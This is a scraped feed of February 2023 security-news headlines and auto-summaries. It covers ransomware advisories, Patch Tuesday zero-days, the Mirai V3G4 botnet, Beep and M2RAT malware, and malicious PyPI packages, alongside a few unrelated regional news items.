                Autosummary: Affected devices: the Arris router firmware version 9.1.103 authenticated RCE exploit has been tested against the TG2482A, TG2492, and SBG10 models, devices that can be commonly found in the Caribbean and Latin America, says Richards. According to Richards, when he contacted Arris (acquired by CommScope), the company said the devices running the vulnerable firmware are end-of-life (EOL) and are no longer supported by the company. "


                Fake Hogwarts Legacy cracks lead to adware, scams

                financial
                2023-02-16 https://www.malwarebytes.com/blog/news/2023/02/fake-hogwarts-legacy-cracks-lead-to-adware-scams

                Categories: News

                Categories: Scams

                Tags: Hogwarts Legacy

                Tags: video game survey scam

                Tags: survey scam

                Tags: Trojan dropper

                Tags: adware

                With Hogwarts Legacy becoming the popular game it was expected to be, online criminals have resorted to old tricks to get users clicking.


                The post Fake Hogwarts Legacy cracks lead to adware, scams appeared first on Malwarebytes Labs.

                "

                Autosummary: But, as with all games like this, it comes with a steep price tag, so it’s no surprise to suddenly see websites peddling "cracked" versions of the game for free. "


                Mirai V3G4 botnet exploits 13 flaws to target IoT devices

                exploits industry
                2023-02-16 https://securityaffairs.com/142358/malware/mirai-v3g4-botnet.html

                During the second half of 2022, a variant of the Mirai bot, tracked as V3G4, targeted IoT devices by exploiting tens of flaws. Palo Alto Networks Unit 42 researchers reported that a Mirai variant called V3G4 was attempting to exploit several flaws to infect IoT devices from July to December 2022. Below is the list […]

                The post Mirai V3G4 botnet exploits 13 flaws to target IoT devices appeared first on Security Affairs.

                "

                Autosummary: The hardcoded command and control (C2) domains among these three campaigns contain the same string (8xl9); the malware shell script downloaders are almost identical between the three campaigns; the botnet client samples use the same XOR decryption key; the botnet client samples use the same “stop list” (a list of target processes that the botnet client searches for and terminates); the botnet client samples use almost identical functions. The botnet exploited 13 vulnerabilities to achieve remote code execution on vulnerable devices. "


                #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

                exploits ransomware ciber
                2023-02-16 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a
                "

                Autosummary: Vulnerable technologies and versions: SonicWall SMA 200, SMA 210, SMA 400, SMA 410 and SMA 500v firmware 10.2.0.8-37Sv, 10.2.1.1-19Sv and 10.2.1.2-24Sv. See https://nvd.nist.gov/vuln/detail/CVE-2021-20038 for more information. Recommended mitigations: apply all appropriate vendor updates. Upgrade to: SMA 100 Series (SMA 200, 210, 400, 410, 500v (ESX, Hyper-V, KVM, AWS, Azure)): SonicWall SMA100 build versions 10.2.0.9-41sv or later, or SonicWall SMA100 build versions 10.2.1.3-27sv or later. System administrators should refer to the SonicWall Security Advisories in the reference section to determine affected applications/systems and appropriate fix actions. Actors have also been observed using or possessing publicly available tools for encryption, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom [T1486]. The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) (hereafter referred to as the “authoring agencies”) are issuing this joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. Resources: Stairwell provided a YARA rule to identify Maui ransomware, and a proof-of-concept public RSA key extractor at the following link: https://www.stairwell.com/news/threat-research-report-maui-ransomware/ Request for information: The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, bitcoin wallet information, the decryptor file, and/or benign samples of encrypted files. Appendix A: CVE Details. CVE-2021-44228, CVSS 3.0: 10 (Critical). Vulnerability description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. 
Contact information: NSA Client Requirements / General Cybersecurity Inquiries: CybersecurityReports@nsa.gov; Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov. To report incidents and anomalous activity related to information found in this Joint Cybersecurity Advisory, contact CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870 or your local FBI field office at www.fbi.gov/contact-us/field. Appendix B: Indicators of Compromise (IOCs). The IOC section includes hashes and IP addresses for the Maui and H0lyGh0st ransomware variants—as well as custom malware implants assumedly developed by DPRK cyber actors, such as remote access trojans (RATs), loaders, and other tools—that enable subsequent deployment of ransomware. 
The authoring agencies urge HPH organizations to: Limit access to data by authenticating and encrypting connections (e.g., using public key infrastructure certificates in virtual private network (VPN) and transport layer security (TLS) connections) with network services, Internet of Things (IoT) medical devices, and the electronic health record system "


                ESXiArgs Ransomware Virtual Machine Recovery Guidance

                exploits ransomware ciber
                2023-02-16 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-039a
                "

                Autosummary: The full list of file extensions encrypted by the malware is: vmdk, vmx, vmxf, vmsd, vmsn, vswp, vmss, nvram, vmem. See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Organizations should also collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections. CISA and FBI encourage all organizations managing VMware ESXi servers to: The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) in response to the ongoing ransomware campaign, known as “ESXiArgs.” Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. "


                Finite State releases Next Gen Platform for software supply chain security

                government
                2023-02-15 https://www.helpnetsecurity.com/2023/02/15/finite-state-next-gen-platform/

                Finite State has released its Next Generation Platform featuring extended SBOM management with the ability to ingest and aggregate 120+ external data sources. The new platform gives Application and Product Security teams a unified and prioritized risk view with unprecedented visibility across the software supply chain lifecycle to scale operations through continuous, next-generation risk management. The launch of the Next Gen Platform will enable Finite State customers to continuously and confidently reduce risk across ‘any-party’ … More

                The post Finite State releases Next Gen Platform for software supply chain security appeared first on Help Net Security.

                "

                Autosummary: Finite State’s Next Gen platform features will include: End-to-end SBOM solution: The solution for generating, collecting, visualizing, and distributing SBOMs in your supply chain. "


                Update Now: Microsoft Releases Patches for 3 Actively Exploited Windows Vulnerabilities

                exploits
                2023-02-15 https://thehackernews.com/2023/02/update-now-microsoft-releases-patches.html
                Microsoft on Tuesday released security updates to address 75 flaws spanning its product portfolio, three of which have come under active exploitation in the wild. The updates are in addition to 22 flaws the Windows maker patched in its Chromium-based Edge browser over the past month. Of the 75 vulnerabilities, nine are rated Critical and 66 are rated Important in severity. 37 out of 75 bugs are "

                Autosummary: The three zero-days of note that have been exploited are as follows: CVE-2023-21715 (CVSS score: 7.3) - Microsoft Office Security Feature Bypass Vulnerability; CVE-2023-21823 (CVSS score: 7.8) - Windows Graphics Component Elevation of Privilege Vulnerability; CVE-2023-23376 (CVSS score: 7.8) - Windows Common Log File System (CLFS) "


                Experts Warn of "Beep" - A New Evasive Malware That Can Fly Under the Radar

                exploits
                2023-02-15 https://thehackernews.com/2023/02/experts-warn-of-beep-new-evasive.html
                Cybersecurity researchers have unearthed a new piece of evasive malware dubbed Beep that’s designed to fly under the radar and drop additional payloads onto a compromised host. "It seemed as if the authors of this malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find," Minerva Labs researcher Natalie Zargarov said. "One such technique "

                Autosummary: "


                Adobe addressed critical bugs in Illustrator, After Effects Software

                exploits
                2023-02-15 https://securityaffairs.com/142280/security/adobe-critical-bugs-illustrator-after-effects-software.html

                Adobe Patch Tuesday addressed at least a half dozen vulnerabilities, including critical issues that expose Windows and macOS to hack. Adobe released security updates to address at least a half dozen vulnerabilities impacting Photoshop, Illustrator and After Effects for both Windows and macOS users. Adobe addressed four critical issues (CVE-2022-24094, CVE-2022-24095, CVE-2022-24096, and CVE-2022-24097) affecting […]

                The post Adobe addressed critical bugs in Illustrator, After Effects Software appeared first on Security Affairs.

                "

                Autosummary: "


                Beep, a new highly evasive malware appeared in the threat landscape

                exploits
                2023-02-15 https://securityaffairs.com/142263/hacking/beep-malware-highly-evasive.html

                Experts detected a new evasive malware dubbed Beep; it implements many anti-debugging and anti-sandbox techniques. Researchers from Minerva recently discovered a new evasive malware dubbed Beep, which implements many anti-debugging and anti-sandbox techniques. The name Beep comes from the use of techniques involved in delaying the execution through the use of the Beep API function. The experts […]

                The post Beep, a new highly evasive malware appeared in the threat landscape appeared first on Security Affairs.

                "

                Autosummary: "


                Community Health Systems data breach caused by GoAnywhere MFT hack

                financial
                2023-02-15 https://securityaffairs.com/142242/data-breach/community-health-systems-data-breach.html

                Community Health Systems (CHS) disclosed a data breach; attackers exploited the zero-day vulnerability in Fortra’s GoAnywhere MFT platform. Community Health Systems (CHS) is one of the nation’s leading healthcare providers. CHS operates 79 acute-care hospitals and more than 1,000 other sites of care, including physician practices, urgent care centers, freestanding emergency departments, occupational medicine clinics, […]

                The post Community Health Systems data breach caused by GoAnywhere MFT hack appeared first on Security Affairs.

                "

                Autosummary: "


                Peru’s Machu Picchu reopens as protests shift to capital

                latam
                2023-02-15 https://www.bbc.co.uk/news/world-latin-america-64648641?at_medium=RSS&at_campaign=KARANGA
                The popular Inca site was closed three weeks ago when anti-government protesters cut off access routes. "

                Autosummary: "


                City of Oakland declares state of emergency after ransomware attack

                exploits government ransomware
                2023-02-15 https://www.bleepingcomputer.com/news/security/city-of-oakland-declares-state-of-emergency-after-ransomware-attack/
                Oakland has declared a local state of emergency because of the impact of a ransomware attack that forced the City to take all its IT systems offline on February 8th. [...]


                Gulp! Pepsi hack sees personal information stolen by data-stealing malware

                exploits
                2023-02-15 https://www.bitdefender.com/blog/hotforsecurity/gulp-pepsi-hack-sees-personal-information-stolen-by-data-stealing-malware/
                Towards the end of last year, malicious hackers broke into the systems of Pepsi Bottling Ventures, the largest privately-owned bottler of Pepsi-Cola beverages in the USA, and installed malware. For almost a month the malware secretly exfiltrated personally identifiable information (PII) from the company's network. Read more in my article on the Hot for Security blog.


                North Korea's APT37 Targeting Southern Counterpart with New M2RAT Malware

                exploits
                2023-02-15 https://thehackernews.com/2023/02/north-koreas-apt37-targeting-southern.html
                The North Korea-linked threat actor tracked as APT37 has been linked to a piece of new malware dubbed M2RAT in attacks targeting its southern counterpart, suggesting continued evolution of the group's features and tactics. APT37, also tracked under the monikers Reaper, RedEyes, Ricochet Chollima, and ScarCruft, is linked to North Korea's Ministry of State Security (MSS) unlike the Lazarus and


                Financially Motivated Threat Actor Strikes with New Ransomware and Clipper Malware

                financial exploits ransomware
                2023-02-15 https://thehackernews.com/2023/02/financially-motivated-threat-actor.html
                A new financially motivated campaign that commenced in December 2022 has seen the unidentified threat actor behind it deploying a novel ransomware strain dubbed MortalKombat and a clipper malware known as Laplas. Cisco Talos said it "observed the actor scanning the internet for victim machines with an exposed remote desktop protocol (RDP) port 3389." The attacks, per the cybersecurity company,


                Russian hacker convicted of $90 million hack-to-trade charges

                rusia-ucrania
                2023-02-15 https://www.bleepingcomputer.com/news/security/russian-hacker-convicted-of-90-million-hack-to-trade-charges/
                Russian national Vladislav Klyushin was found guilty of participating in a global scheme that involved hacking into U.S. computer networks to steal confidential earnings reports, which helped the criminals net $90,000,000 in illegal profits. [...]


                Hyundai, Kia patch bug allowing car thefts with a USB cable

                exploits
                2023-02-15 https://www.bleepingcomputer.com/news/security/hyundai-kia-patch-bug-allowing-car-thefts-with-a-usb-cable/
                Automakers Hyundai and KIA are rolling out an emergency software update on several of their car models impacted by an easy hack that makes it possible to steal them. [...]

                Autosummary: The second rollout phase will be completed by June 2023 and will cover the following models: 2018-2022 Accent, 2011-2016 Elantra, 2021-2022 Elantra, 2018-2020 Elantra GT, 2011-2014 Genesis Coupe, 2018-2022 Kona, 2020-2021 Palisade, 2013-2018 Santa Fe Sport, 2013-2022 Santa Fe, 2019 Santa Fe XL, 2011-2014 Sonata, 2011-2022 Tucson, 2012-2017 and 2019-2021 Veloster. The free upgrade will be installed by Hyundai's official dealer and service network in the U.S. and will take less than an hour.


                City of Oakland issued a local state of emergency after recent ransomware attack

                exploits government ransomware
                2023-02-15 https://securityaffairs.com/142295/cyber-crime/city-of-oakland-emergency-ransomware.html

                The City of Oakland has declared a local state of emergency due to the effect of the ransomware attack that hit the city on February 8, 2023. The City of Oakland disclosed the ransomware attack last week; the security breach began on February 8, 2023. In an abundance of caution, the City of Oakland has […]

                The post City of Oakland issued a local state of emergency after recent ransomware attack appeared first on Security Affairs.



                Update now! February's Patch Tuesday tackles three zero-days

                exploits
                2023-02-15 https://www.malwarebytes.com/blog/news/2023/02/patch-now-patch-tuesday-february-tackles-three-zero-days

                Categories: Exploits and vulnerabilities, News

                Tags: patch Tuesday, Microsoft, Apple, Adobe, SAP, Citrix, Cisco, Atlassian, Google, Mozilla, Forta, OpenSSH, CVE-2023-21823, CVE-2023-21715, OneNote, CVE-2023-23376, CVE-2023-21706, CVE-2023-21707, CVE-2023-21529, CVE-2023-21716, CVE-2023-23378, CVE-2023-22501, CVE-2023-24486, CVE-2023-24484, CVE-2023-24483, CVE-2023-25136, GoAnywhere

                Microsoft has released updates to patch three zero-days and lots of other vulnerabilities, and so have several other vendors.

                The post Update now! February's Patch Tuesday tackles three zero-days appeared first on Malwarebytes Labs.

                Autosummary: Citrix has released security updates to address high-severity vulnerabilities (CVE-2023-24486, CVE-2023-24484, CVE-2023-24485, and CVE-2023-24483) in Citrix Workspace Apps, Virtual Apps and Desktops. The Patch Tuesday roundup from Microsoft for February 2023 includes three zero-days. Unpatched: Microsoft has also disclosed a vulnerability listed as CVE-2023-23378 in the end-of-life (EOL) application Print 3D. EOL is an expression commonly used by software vendors to indicate that a product or version of a product has reached the end of usefulness in the eyes of the vendor.


                TrickBot gang members sanctioned after pandemic ransomware attacks

                exploits ransomware
                2023-02-15 https://www.malwarebytes.com/blog/news/2023/02/trickbot-gang-members-sanctioned-after-pandemic-ransomware-attacks

                Categories: News

                Tags: Conti, ransomware, TrickBot, sanction

                The US, in partnership with the UK, named individuals tied to TrickBot and shamed them with a sanction.


                The post TrickBot gang members sanctioned after pandemic ransomware attacks appeared first on Malwarebytes Labs.

                Autosummary: Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson said in a statement: "Cybercriminals, particularly those based in Russia, seek to attack critical infrastructure, target US businesses, and exploit the international financial system." According to the sanctions notice, in one attack the group deployed ransomware against three Minnesota medical facilities, disrupting their computer networks and telephones, and causing ambulances to divert. In a collaborative partnership, officials in the United States and the United Kingdom unmasked and imposed financial sanctions against seven members of the notorious Russian gang TrickBot (alias "TrickLoader"), a mainstream banking Trojan turned malware-as-a-service (MaaS) platform for other criminals.


                Panama migrant bus plunges off road killing 39

                latam
                2023-02-15 https://www.bbc.co.uk/news/world-latin-america-64653129?at_medium=RSS&at_campaign=KARANGA
                Migrants hoping to reach the US died when their bus fell into a ravine near Costa Rica.


                10 signs that scammers have you in their sights

                financial
                2023-02-15 https://www.welivesecurity.com/2023/02/15/10-signs-scammers-sights/

                Don’t be their next victim – here’s a handy round-up of some of the most common signs that should set your alarm bells ringing

                The post 10 signs that scammers have you in their sights appeared first on WeLiveSecurity

                Autosummary: Popular tactics include cold-calling victims pretending, for example, that something is wrong with their computer (tech support fraud) or that there is something wrong with any of your valuable online accounts, i.e., typically those containing your personal and financial data. There is an almost limitless variety of themes, but phishing generally works via social engineering, a way that fraudsters trick victims into doing their bidding – for example by forcing them into making a rushed decision, and/or pretending to be a representative from a reputable organization like the government, a tech vendor or bank. When we’re finished with work, we’re hitting up our apps to watch TV, do our online banking, play games, socialize with friends – even visit the doctor. The “#WhatsApp Pink” trojan can now auto-reply to received messages not only on WhatsApp, but also Signal, Skype, Viber and Telegram.


                Apple fixes the first zero-day in iPhones and Macs this year

                exploits
                2023-02-14 https://securityaffairs.com/142200/hacking/apple-zero-day-iphones-macs.html

                Apple has released emergency security updates to fix a new actively exploited zero-day vulnerability that impacts iPhones, iPads, and Macs. Apple has released emergency security updates to address a new actively exploited zero-day vulnerability, tracked as CVE-2023-23529, that impacts iOS, iPadOS, and macOS. The flaw is a type confusion issue in WebKit that was addressed […]

                The post Apple fixes the first zero-day in iPhones and Macs this year appeared first on Security Affairs.



                Enigma info-stealing malware targets the cryptocurrency industry

                exploits industry
                2023-02-14 https://securityaffairs.com/142187/cyber-crime/enigma-info-stealer-cryptocurrency-industry.html

                Alleged Russian threat actors have been targeting cryptocurrency users in Eastern Europe with Enigma info-stealing malware. A malware campaign conducted by alleged Russian threat actors has been targeting users in Eastern Europe in the crypto industry. The attackers are sending out emails with fake job opportunities as bait in an attempt to trick victims into […]

                The post Enigma info-stealing malware targets the cryptocurrency industry appeared first on Security Affairs.

                Autosummary: Upon opening the Microsoft Word document, the first-stage Enigma loader is launched, which, in turn, downloads and executes an obfuscated secondary-stage payload through Telegram.


                Get hired in cybersecurity: Expert tips for job seekers

                ciber
                2023-02-14 https://www.helpnetsecurity.com/2023/02/14/get-hired-in-cybersecurity-expert-tips-for-job-seekers/

                The dire shortage of information security experts has left organizations struggling to keep up with the growing demand for their skills. Still, getting a job in cybersecurity tends to take time and effort. In this Help Net Security interview, Joseph Cooper, Cybersecurity Recruiter at Aspiron Search, offers practical advice for job seekers and talks about how the cybersecurity profession continues to expand. 1. Despite a significant cybersecurity skills gap, getting an entry-level job is difficult. … More

                The post Get hired in cybersecurity: Expert tips for job seekers appeared first on Help Net Security.

                Autosummary: My biggest piece of advice here would be to get close to a niche industry-specific recruiter like myself; I would welcome anyone to reach out for interview preparation, as recruiters have a ton of valuable insight into the market, recruiting processes, and interview questions. We typically break cybersecurity into 16 category specialisms, so when you identify which area you would like to work in, for example, security testing or security operations, you can move on to my second piece of advice – here are the 16 specialisms. Try and keep your resume to 2 pages; if you have had a long career with multiple roles, the reality is recruiters and hiring managers do not care about your first job out of school, they are focused very much on your last 3 roles, what your experience was, what you achieved and how you can add value in your next role. In this Help Net Security interview, Joseph Cooper, Cybersecurity Recruiter at Aspiron Search, offers practical advice for job seekers and talks about how the cybersecurity profession continues to expand.


                Patch Now: Apple's iOS, iPadOS, macOS, and Safari Under Attack with New Zero-Day Flaw

                exploits
                2023-02-14 https://thehackernews.com/2023/02/patch-now-apples-ios-ipados-macos-and.html
                Apple on Monday rolled out security updates for iOS, iPadOS, macOS, and Safari to address a zero-day flaw that it said has been actively exploited in the wild. Tracked as CVE-2023-23529, the issue relates to a type confusion bug in the WebKit browser engine that could be activated when processing maliciously crafted web content, culminating in arbitrary code execution. The iPhone maker said the


                Ransomware attackers steal over 3 million patients’ medical records

                exploits
                2023-02-14 https://www.bitdefender.com/blog/hotforsecurity/ransomware-attackers-steal-over-3-million-patients-medical-records/
                A ransomware attack has again put the personal information of innocent parties at risk after it was revealed that a data breach has potentially exposed the medical records of more than three million people. Read more in my article on the Hot for Security blog.


                Apple fixes actively exploited WebKit zero-day in iOS, macOS (CVE-2023-23529)

                exploits
                2023-02-14 https://www.helpnetsecurity.com/2023/02/14/cve-2023-23529/

                Apple has released security updates that fix a WebKit zero-day vulnerability (CVE-2023-23529) that “may have been actively exploited.” The bug has been fixed in iOS 16.3.1 and iPadOS 16.3.1, macOS Ventura 13.2.1, Safari 16.3.1, and possibly also in tvOS 16.3.2 and watchOS 9.3.1 – though release notes for the updates for those Internet of Things operating systems have been temporarily withheld. About CVE-2023-23529 CVE-2023-23529 is a type confusion issue in WebKit, the browser engine powering … More

                The post Apple fixes actively exploited WebKit zero-day in iOS, macOS (CVE-2023-23529) appeared first on Help Net Security.



                Malware that can do anything and everything is on the rise

                exploits
                2023-02-14 https://www.helpnetsecurity.com/2023/02/14/multi-purpose-malware-on-the-rise/

                “Swiss Army knife” malware – multi-purpose malware that can perform malicious actions across the cyber-kill chain and evade detection by security controls – is on the rise, according to the results of Picus Security’s analysis of over 550,000 real-world malware samples gathered from commercial and open-source threat intelligence services, security vendors and researchers, and malware sandboxes and databases. Key findings By observing the malware’s behavior, the company’s researchers extracted over 5 million malicious actions and … More

                The post Malware that can do anything and everything is on the rise appeared first on Help Net Security.

                Autosummary: The most common malicious actions observed were: the collection of data about computer systems or networks (to facilitate lateral movement); the use of remote services (e.g., RDP, SSH, VNC, etc.) for access and control; the abuse of Windows Management Instrumentation to execute malicious commands and payloads in compromised Windows hosts; the use of scheduled tasks/jobs; anti-virtualization and anti-sandboxing capabilities; and the discovery of remote hosts and networks. The analysis has shown that the average malware leverages 11 different tactics, techniques, and procedures (TTPs).


                Python Developers Beware: Clipper Malware Found in 450+ PyPI Packages!

                exploits
                2023-02-14 https://thehackernews.com/2023/02/python-developers-beware-clipper.html
                Malicious actors have published more than 451 unique Python packages on the official Python Package Index (PyPI) repository in an attempt to infect developer systems with clipper malware. Software supply chain security company Phylum, which spotted the libraries, said the ongoing activity is a follow-up to a campaign that was initially disclosed in November 2022. The initial vector entails using


                A CISO's Practical Guide to Storage and Backup Ransomware Resiliency

                exploits ransomware
                2023-02-14 https://thehackernews.com/2023/02/a-cisos-practical-guide-to-storage-and.html
                One thing is clear. The "business value" of data continues to grow, making it an organization's primary piece of intellectual property. From a cyber risk perspective, attacks on data are the most prominent threat to organizations. Regulators, cyber insurance firms, and auditors are paying much closer attention to the integrity, resilience, and recoverability of organization data – as well as

                Autosummary: Source: CISO Point of View: The ever-changing role of data, and the implications for data protection & storage security (Continuity). CISOs are concerned about the rise of ransomware – not only the proliferation of attacks but also their sophistication. "The storage and backup environments are now under attack, as the attackers realize that this is the single biggest determining factor to show if the company will pay the ransom," says George Eapen, Group CIO (and former CISO) at Petrofac. John Meakin, former CISO at GlaxoSmithKline, BP, Standard Chartered, and Deutsche Bank, believes that "As important as it may be, data encryption is hardly enough to protect an organization's core data." 4 Steps to Success: define comprehensive security baselines for all components of storage and backup systems (NIST Special Publication 800-209, Security Guidelines for Storage Infrastructure, provides a comprehensive set of recommendations for the secure deployment, configuration, and operation of storage & backup systems); use automation to reduce exposure to risk and allow much more agility in adapting to changing priorities.


                Scammers profit from Turkey-Syria earthquake

                financial
                2023-02-14 https://www.bbc.co.uk/news/world-europe-64599553?at_medium=RSS&at_campaign=KARANGA
                BBC News investigates the tactics used by scammers to make money when natural disasters strike.


                Healthcare giant CHS reports first data breach in GoAnywhere hacks

                financial
                2023-02-14 https://www.bleepingcomputer.com/news/security/healthcare-giant-chs-reports-first-data-breach-in-goanywhere-hacks/
                Community Health Systems (CHS) says it was impacted by a recent wave of attacks targeting a zero-day vulnerability in Fortra's GoAnywhere MFT secure file transfer platform. [...]

                Autosummary: Organizations that had their Accellion servers hacked include, among others, energy giant Shell, cybersecurity firm Qualys, supermarket giant Kroger, and multiple universities worldwide such as Stanford Medicine, University of Colorado, University of Miami, University of California, and the University of Maryland Baltimore (UMB).


                New stealthy "Beep" malware focuses heavily on evading detection

                exploits
                2023-02-14 https://www.bleepingcomputer.com/news/security/new-stealthy-beep-malware-focuses-heavily-on-evading-detection/
                A new stealthy malware named "Beep" was discovered last week, featuring many capabilities to evade analysis and detection by security software. [...]

                Autosummary: Collecting data from the breached system (Minerva). Despite the limitations in the analysis of the malware, Minerva was still able to identify the following functions in the sample, which are triggered by C2 commands: balancer – not implemented yet; init – not implemented yet; screenshot – appears to collect the process list; task – not implemented yet; destroy – not implemented yet; shellcode – executes additional shellcode; dll – executes a dll file; exe – executes an .exe file; Additional – collects additional info; knock_timeout – changes C&C "keep-alive" intervals. Evading detection: What makes the Beep malware stand out is its use of multiple techniques throughout its execution flow to evade detection and analysis by security software and researchers. String deobfuscation (Minerva). In addition to the above, the injector component also implements the following evasion techniques: INT 3 anti-debugging – generate an exception that will force debuggers to stop working.


                New ‘MortalKombat’ ransomware targets systems in the U.S.

                exploits ransomware
                2023-02-14 https://www.bleepingcomputer.com/news/security/new-mortalkombat-ransomware-targets-systems-in-the-us/
                Hackers conducting a new financially motivated campaign are using a variant of the Xortist commodity ransomware named "MortalKombat," together with the Laplas clipper in cyberattacks. [...]

                Autosummary: All file types targeted by the ransomware (Cisco) "Talos observed that MortalKombat encrypts various files on the victim machine’s filesystem, such as system, application, database, backup, and virtual machine files, as well as files on the remote locations mapped as logical drives in the victim’s machine," describes the report.


                Experts discover over 451 clipper malware-laced packages in the PyPI repository

                exploits
                2023-02-14 https://securityaffairs.com/142220/malware/451-clipper-malware-pypi.html

                Threat actors published more than 451 unique malware-laced Python packages on the official Python Package Index (PyPI) repository. Phylum researchers spotted more than 451 unique Python packages on the official Python Package Index (PyPI) repository in an attempt to deliver clipper malware on the developer systems. According to the experts, the activity is still ongoing […]

                The post Experts discover over 451 clipper malware-laced packages in the PyPI repository appeared first on Security Affairs.

                Autosummary: Threat actors have typosquatted several major packages in PyPI such as: bitcoinlib, ccxt, cryptocompare, cryptofeed, freqtrade, selenium, solana, vyper, websockets, yfinance, pandas, matplotlib, aiohttp, beautifulsoup, tensorflow, scrapy, colorama, scikit-learn, pytorch, pygame, pyinstaller. The researchers reported that the attackers are trying to register the same code in every possible simple typo of a package name.


                Microsoft February 2023 Patch Tuesday fixes 3 exploited zero-days, 77 flaws

                exploits
                2023-02-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-february-2023-patch-tuesday-fixes-3-exploited-zero-days-77-flaws/
                Today is Microsoft's February 2023 Patch Tuesday, and security updates fix three actively exploited zero-day vulnerabilities and a total of 77 flaws. [...]

                Autosummary: The number of bugs in each vulnerability category is listed below: 12 Elevation of Privilege Vulnerabilities; 2 Security Feature Bypass Vulnerabilities; 38 Remote Code Execution Vulnerabilities; 8 Information Disclosure Vulnerabilities; 10 Denial of Service Vulnerabilities; 8 Spoofing Vulnerabilities. This count does not include three Microsoft Edge vulnerabilities fixed earlier this month.


                Microsoft patches three exploited zero-days (CVE-2023-21715, CVE-2023-23376, CVE-2023-21823)

                exploits
                2023-02-14 https://www.helpnetsecurity.com/2023/02/14/microsoft-patches-three-exploited-zero-days-cve-2023-21715-cve-2023-23376-cve-2023-21823/

                The February 2023 Patch Tuesday is upon us, with Microsoft releasing patches for 75 CVE-numbered vulnerabilities, including three actively exploited zero-day flaws (CVE-2023-21715, CVE-2023-23376, CVE-2023-21823). The three zero-days (CVE-2023-21715, CVE-2023-23376, CVE-2023-21823) CVE-2023-21715 is a vulnerability that allows attackers to bypass a Microsoft Publisher security feature: the Office macro policies used to block untrusted or malicious files. “The attack itself is carried out locally by a user with authentication to the targeted system. An authenticated attacker could exploit … More

                The post Microsoft patches three exploited zero-days (CVE-2023-21715, CVE-2023-23376, CVE-2023-21823) appeared first on Help Net Security.



                Watchdog cracks down on crypto ATM operators around Leeds

                financial
                2023-02-14 https://www.bbc.co.uk/news/technology-64636986?at_medium=RSS&at_campaign=KARANGA
                The Financial Conduct Authority enters sites suspected of hosting illegally operated crypto cash machines.


                RedEyes hackers use new malware to steal data from Windows, phones

                exploits
                2023-02-14 https://www.bleepingcomputer.com/news/security/redeyes-hackers-use-new-malware-to-steal-data-from-windows-phones/
                The APT37 threat group (aka "RedEyes" or "ScarCruft") has been spotted using a new evasive malware named "M2RAT" along with steganography to attack specific individuals for intelligence collection. [...]

                Autosummary: This JPG image file uses steganography, a technique that allows hiding code inside files, to stealthily introduce the M2RAT executable ("lskdjfei.exe") onto the system and inject it into "explorer.exe." Malware code hiding in the JPEG file (ASEC) For persistence on the system, the malware adds a new value ("RyPO") in the "Run" Registry key, with commands to execute a PowerShell script via "cmd.exe."


                Microsoft Patch Tuesday for February 2023 fixed actively exploited zero-days

                exploits
                2023-02-14 https://securityaffairs.com/142230/security/microsoft-patch-tuesday-february-2023.html

                Microsoft Patch Tuesday security updates for February 2023 addressed 75 flaws, including three actively exploited zero-day bugs. Microsoft Patch Tuesday security updates for February 2023 fixed 75 vulnerabilities in multiple products, including Microsoft Windows and Windows Components; Office and Office Components; Exchange Server; .NET Core and Visual Studio Code; 3D Builder and Print 3D; Microsoft […]

                The post Microsoft Patch Tuesday for February 2023 fixed actively exploited zero-days appeared first on Security Affairs.



                Cybercriminals exploit fear and urgency to trick consumers

                exploits ciber
                2023-02-13 https://www.helpnetsecurity.com/2023/02/13/cybercriminals-exploit-fear-urgency-trick-consumers/

                Cybercriminals remained active in spying and information stealing, with lottery-themed adware campaigns used as a tactic to obtain people’s contact details, according to Avast. Threats using social engineering to steal money, such as refund and invoice fraud and tech support scams, increased during Q4 of 2022. Threat researchers also discovered zero-day exploits in Google Chrome and Windows. These vulnerabilities have since been patched. “At the end of 2022, we have seen an increase in human-centered … More

                The post Cybercriminals exploit fear and urgency to trick consumers appeared first on Help Net Security.

                Autosummary: There was also a 57% increase in people and businesses protected against AgentTesla, a strain of malware that often spreads through phishing emails to businesses and is designed to steal credentials, as well as a 37% increase in RedLine stealer, which often spreads in cracked games and services, stealing information from browsers and cryptowallets. “Fraudulent invoices often look legitimate, and people need to verify whether an order really was made, the service received, and whether the sender is truly who they pretend to be,” said Kroustek.


                Ransomware hits Technion university, protests tech layoffs and Israel

                exploits
                2023-02-13 https://www.bleepingcomputer.com/news/security/ransomware-hits-technion-university-protests-tech-layoffs-and-israel/
                A new ransomware group going by the name "DarkBit" has hit Technion - Israel Institute of Technology, one of Israel"s leading research universities. The ransom note posted by DarkBit is littered with messaging protesting tech layoffs and promoting anti-Israel rhetoric, as well as the group demanding a $1.7 million payment. [...] "

